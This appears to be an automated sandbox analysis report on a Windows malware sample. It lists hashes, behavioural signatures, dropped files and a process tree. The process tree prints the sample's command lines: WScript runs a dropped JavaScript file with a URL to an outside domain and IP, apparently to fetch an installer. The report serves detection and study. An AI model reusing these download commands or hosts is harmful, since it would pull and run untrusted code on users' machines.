Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
25/05/2024, 09:40
Static task
static1
Behavioral task
behavioral1
Sample
71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe
-
Size
184KB
-
MD5
71913d5052192b0b1ef05360acdbf1b9
-
SHA1
ddb709c9a4d9b88bb85ba412c6cbc64b8d12a4bd
-
SHA256
3d0d95b56a60f77356c232c41e08cd959c2c6643e6eace94e64b631e5e77a974
-
SHA512
fd6c1db9a822174404bd9f7ed881853dfef16276ac8e8a988f206d791924626d0d3dbb44e98221ceb910d73acd890e1cda59402a0dbf2becc39d67424cee5519
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3T:/7BSH8zUB+nGESaaRvoB7FJNndnG
Malware Config
Signatures
-
Blocklisted process makes network request 11 IoCs
flow pid Process 6 2332 WScript.exe 8 2332 WScript.exe 10 2332 WScript.exe 12 1512 WScript.exe 13 1512 WScript.exe 15 2004 WScript.exe 16 2004 WScript.exe 18 1880 WScript.exe 19 1880 WScript.exe 21 1584 WScript.exe 22 1584 WScript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2852 wrote to memory of 2332 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 28 PID 2852 wrote to memory of 2332 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 28 PID 2852 wrote to memory of 2332 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 28 PID 2852 wrote to memory of 2332 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 28 PID 2852 wrote to memory of 1512 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 30 PID 2852 wrote to memory of 1512 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 30 PID 2852 wrote to memory of 1512 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 30 PID 2852 wrote to memory of 1512 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 30 PID 2852 wrote to memory of 2004 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 32 PID 2852 wrote to memory of 2004 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 32 PID 2852 wrote to memory of 2004 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 32 PID 2852 wrote to memory of 2004 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 32 PID 2852 wrote to memory of 1880 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 34 PID 2852 wrote to memory of 1880 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 34 PID 2852 wrote to memory of 1880 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 34 PID 2852 wrote to memory of 1880 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 34 PID 2852 wrote to memory of 1584 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 36 PID 2852 wrote to memory of 1584 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 36 PID 2852 wrote to memory of 1584 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 36 PID 2852 wrote to memory of 1584 2852 71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\71913d5052192b0b1ef05360acdbf1b9_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf703.js" http://www.djapp.info/?domain=UmXTEXABXM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fuf703.exe2⤵
- Blocklisted process makes network request
PID:2332
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf703.js" http://www.djapp.info/?domain=UmXTEXABXM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fuf703.exe2⤵
- Blocklisted process makes network request
PID:1512
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf703.js" http://www.djapp.info/?domain=UmXTEXABXM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fuf703.exe2⤵
- Blocklisted process makes network request
PID:2004
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf703.js" http://www.djapp.info/?domain=UmXTEXABXM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fuf703.exe2⤵
- Blocklisted process makes network request
PID:1880
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf703.js" http://www.djapp.info/?domain=UmXTEXABXM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fuf703.exe2⤵
- Blocklisted process makes network request
PID:1584
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD56f6e3fca3096a0e7e7eb59d51f4a5350
SHA1c978fa12d9045c593d5e7e097037ee465e09c3b2
SHA256d27a9ba9c11dbd9c2b2bcb61a4128f457e7d15a3db20fad170588821e4003d78
SHA512c45004cb6359a32eb55f1f2ff762ab948d79991ec890ceaf988d513ff9cd4dc0168deb2235b391b43ca8d69d960ba302fde0ed13a2b0e1dddbd63135f27cb546
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD5a767597625755dbcba728f909a90e772
SHA1e71ec9c2592a1f000af4353853730114273b0c95
SHA25619a5a3f3ee78215620dee3f5d7e44500a1e406930084ad8288f8fab7d8ac842b
SHA512a0f73ee1006016834a0f131c4616fbcbfb5bf20cd089e38d0f7b7fa114abec1019470202b51554dda3d0a8d24bd8bce50ab64d20dce3cda741d73554b91b8dd0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5be7306b8ae808d25f0e4563e9909909c
SHA1df26d08eb0c2339f842354fc8d238f7fdb57d033
SHA256af29f19400224c723111f2458b57fd0f7ed85ddc07d801cc75271b783f57a772
SHA51210d6a4dd094b575c3c8a7397819a23b73fb357701705f7dc6112aa9802029a1c9c4753eb160f2cdb411a7a182444cba7204c01c0819518d8a6675c86280a424a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize392B
MD5a30eaaffc0d911de973cb43056a30031
SHA18156dcc4133b1d14b21aad5e9d6ed977bc34a73a
SHA2565e45d84748be2f28f0e2949f24baa6778f8daef89e8ab874f73017414e98d760
SHA512e340758bc308c6a7ccfdb30980cba0e1c81ff4ad080fcd2e3ba6099692a7bf0738ceaa349bfddad16f69f8be0d9896a5a1a084e667627ed47b8cde59742d6182
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm
Filesize40KB
MD5e7076b6f67a10b2c44b9161774bcdffe
SHA103b90fac8d5322ac045162465258015b6cfb3e02
SHA2565c97d3b0635482b6c97262d821d74fedab12affe33da7644276075930e7f1549
SHA512a21c742160c98284f92248b0e5a8d919c3c2326868cd986322da357eaa965aa8bde651e6cea44c4f4dedc6f142d892aed7c11439af1ebb023ef3f04e72f5dcc4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm
Filesize40KB
MD50843a34f309bb3b6505e8bf8848ad6a2
SHA18bc379d2d5ec05287ead1ae9baa2574963add88f
SHA2567ed0591e0aea729542c6fff663f19b74ef8d6faea80c6c287518054da846db06
SHA512bee01be0e854639d931f942781ce067cc9b796565dd1a151f824c7051a163f3962b775a649c5fe9a8963381305890d0bc8a1e6db978bc58f2ec6792e97d96f5e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm
Filesize6KB
MD5b1306e2f1fbbc9643559ece81a332abb
SHA1a46d61603a137f0081497350fd58001506ce3d95
SHA256f5acb7e38475c6cfc691ad0262ea4fa0bda3ce38888bdb9faf33c15513675d86
SHA512cd7b7d4b49b178c3bbfd5070b48a2a0c655dfab4d10545e85e1c589233d9948f7395413d132c758e157fae822b80d66a760942526aa3c8d44faf4149c42e651f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm
Filesize40KB
MD58352ba8a31ad6775f017f48342e95436
SHA1610421c2b3fa108402193aece59361237c60a0eb
SHA256c8e8c61fefc6039c308606bb27ee6f33bd8584560b64433da7f4ec03421895ae
SHA5129e28162d983895a1b4e9dd75cfd51b907a154b174e5a6d9348b449c915232ba195c05e6189f6d178919813431744a5609bcb3f542886cc8edec6455a94bc9ebc
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
-
Filesize
177B
MD54759041208612cfd9ff056b0a7769b42
SHA176008b528aca1deff8456ca85511f3332e4a7b5e
SHA256c3563a0df75899d987bb97de24f4ca27f004a8d7852000de67917e2ca78ae15f
SHA512c9e96dfd45e96faf9a36fee55bf14b2e909a1aad4b50707780f2abfc2ce71db3b070d7def1fc78a9800698dea8b24776ec3c50c67806c5fb83cfe742143deda1